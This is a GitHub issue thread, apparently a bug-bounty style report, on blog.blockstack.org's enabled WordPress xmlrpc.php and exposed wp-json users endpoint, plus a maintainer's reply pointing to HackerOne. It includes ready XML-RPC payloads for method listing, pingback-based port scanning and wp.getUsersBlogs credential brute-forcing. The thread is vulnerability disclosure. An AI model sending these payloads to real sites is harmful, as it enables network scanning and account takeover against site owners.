### ISSUE TITLE
WORDPRESS xmlrpc enabled and user enumeration

### ISSUE THREAD

**Issue by venom26** [blockstack/stacks-blockchain#2102]
**Description:-**

Vulnerability:- XMLRPC file enabled which leads to DoS , Port Scanning and auth brutefroce attack.

Vulnerable Domain:- [blog.blockstack.org](http://blog.blockstack.org/)

Steps To Reproduce:-
1)Go to vulnerable domain i.e, [https://blog.blockstack.org/xmlrpc.php](https://blog.blockstack.org/xmlrpc.php)
2) intercept the request and change method to POST
3)Now to check which methoda are enabled enter the below code in POST body

```
<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

```

4)You can see 'pingback.ping' method is enabled which can be used for PORT scanning
5)For scanning internal network or your machine use below code

```
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value>
        <string>http://your_server:port</string>
      </value>
    </param>
    <param>
      <value>
        <string>https://blog.blockstack.org/xmlrpc.php></string>
      </value>
    </param>
  </params>
</methodCall>

```

6)Also below code can be used to bruteforce username and pasword

```
<?xml version="1.0" encoding="UTF-8"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>\\{\\{your username\\}\\}</value></param> 
<param><value>\\{\\{your password\\}\\}</value></param> 
</params> 
</methodCall>

```

**Impact:-**

1)Port Scanning
2)Denial Of Service
3)Bruteforce
4)Actual server IP leak behind firewall

#Username Enumeration:-

#Vulnerable Endpoint:-

[https://blog.blockstack.org/wp-json/wp/v2/users/](https://blog.blockstack.org/wp-json/wp/v2/users/)

#Impact:-

This usernames can be used to bruteforce credentials with above xmlrpc method.

**Comment by diwakergupta** [comment]
@venom26 thanks, but this repository is for bugs / features / enhancements to the Stacks Blockchain proper. Please refer to https://hackerone.com/blockstack for security disclosure about websites etc.
